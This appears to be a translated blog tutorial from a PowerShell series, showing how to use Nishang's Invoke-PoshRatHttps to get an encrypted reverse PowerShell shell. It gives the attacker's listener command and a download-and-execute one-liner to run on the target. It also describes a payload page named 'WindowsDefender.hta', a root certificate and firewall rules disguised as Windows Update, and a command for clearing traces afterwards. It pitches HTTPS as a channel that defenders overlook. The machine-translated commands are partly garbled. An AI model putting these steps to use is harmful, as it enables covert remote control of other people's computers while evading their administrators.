One week PowerShell script Day 3: HTTPS script

One week PowerShell script Day 3: HTTPS script

Welcome to the third day of the week's PowerShell script. Today we will discuss HTTP/HTTPS.
We usually use HTTPS for security considerations. It is precisely because of this that HTTPS traffic is often ignored by system administrators or security personnel. This makes HTTPS an ideal channel for scripts. Here, I have stolen the Poshrat of Kathy Smith (@ subTee) and made some modifications. Finally, I provided the Invoke-PoshRatHttps.
Invoke-PoshRatHttps, as its name implies, is to establish an encrypted channel between the target and the attacker. This is missing from the previous two days. You can find it in the Shells directory of Nishang: https://github.com/samratashok/nishang.
Invoke-PoshRatHttps requires administrator privileges on the attacker's machine to listen to the port and install the SSL certificate. First, we run a listener on the machine:
Ps c: \> Invoke-PoshRatHttp 192.168.254.1-Port 80-SSLPort 443
Note: The Listener needs two ports. One is used to initialize the connection, and the other is used to encrypt the communication.
On the target machine, we only need to execute the following command (pay attention to HTTP ):
Ps c: \> Invoke-Expression (New-Object Net. WebClient). DownloadString ('HTTP: // 192.168.254.1/connect ')
In addition, we can open the HTA file in the browser on the target machine. However, various possible browser errors reduce the attack success rate. The URL of the HTA file to be opened is:
Https: // 192.168.254.1/WindowsDefender. hta
Let's take a look at the actual results:

Good, an encrypted interactive reverse PowerShell!
In Wireshark, we can see that except for the initial connection, the request packet is HTTP, and all other traffic is HTTPS. The HTTP initial connection request packet is used to set the HTTPS encrypted channel.

Pcap package can get in my Google drive: https://drive.google.com/folderview? Id = shard & usp = sharing
(Note: The translator has moved the data packet to the domestic cloud disk link: http://pan.baidu.com/s/1i4ikCAD password: nw06)
Note that Invoke-PoshRatHttps will install a root certificate named "Windows Update Agent", and you must specify the IP address and port number of your machine, create two firewall rules named "Windows Update HTTPS" and "Windows Update HTTP.
The following is the HTTP Version, Invoke-PoshRatHttp:

It is precisely because the Invoke-PoshRatHttps client is very small and can be used with a variety of technologies that make Invoke-PoshRatHttps very easy to use.
Finally, after using Invoke-PoshRatHttps on the target machine, we can use Remove-PoshRat to clear traces. However, we need a permission-raising PowerShell to run Remove-PoshRat.

Nishang has another HTTPS script Invoke-PsGcat, which uses Gmail to execute commands or scripts.